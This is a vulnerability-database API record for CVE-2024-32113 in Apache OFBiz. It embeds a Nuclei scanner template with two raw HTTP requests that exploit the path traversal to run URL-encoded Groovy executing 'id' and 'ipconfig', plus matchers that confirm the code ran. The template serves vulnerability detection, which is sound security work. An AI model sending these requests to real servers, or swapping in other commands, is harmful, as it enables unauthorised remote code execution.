{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-32113/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-32113/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-32113/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-32113/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-32113/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-32113"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-32113"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-32113.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2024-32113\n\ninfo:\n  name: Apache OFBiz Directory Traversal - Remote Code Execution\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.13\n  impact: |\n    An attacker can exploit this directory traversal vulnerability to execute arbitrary code remotely, potentially compromising the entire system and accessing sensitive data.\n  remediation: |\n    Users are recommended to upgrade to version 18.12.13, which fixes the issue.\n  reference:\n    - https://issues.apache.org/jira/browse/OFBIZ-13006\n    - https://lists.apache.org/thread/w6s60okgkxp2th1sr8vx0ndmgk68fqrd\n    - https://ofbiz.apache.org/download.html\n    - https://ofbiz.apache.org/security.html\n    - https://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-32113\n  classification:\n    cve-id: CVE-2024-32113\n    cvss-score: 9.8\n    cwe-id: CWE-22\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    epss-score: 0.99442\n    epss-percentile: 0.99941\n    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: app=\"Apache_OFBiz\"\n    shodan-query: 'title:\"OFBiz\"'\n    product: ofbiz\n    vendor: apache\n  tags: cve,cve2024,apache,ofbiz,rce,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        groovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74);\n\n      - |\n        POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        groovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%70%63%6F%6E%66%69%67%27.%65%78%65%63%75%74%65().%74%65%78%74);\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - 'IPv4 Address[\\s.]*:\\s*(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})'\n          - 'uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)'\n        condition: or\n\n      - type: word\n        part: body\n        words:\n          - 'java.lang.Exception'\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502203f32f93b1b9e3bb38809415c964d83acfaf9ad91462fcf0cb747294e18fec236022100e1a5d9730cb945d8d32151ce5fb4c43d3be84971c6501ec429cdbf870347f89d:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-32113"
}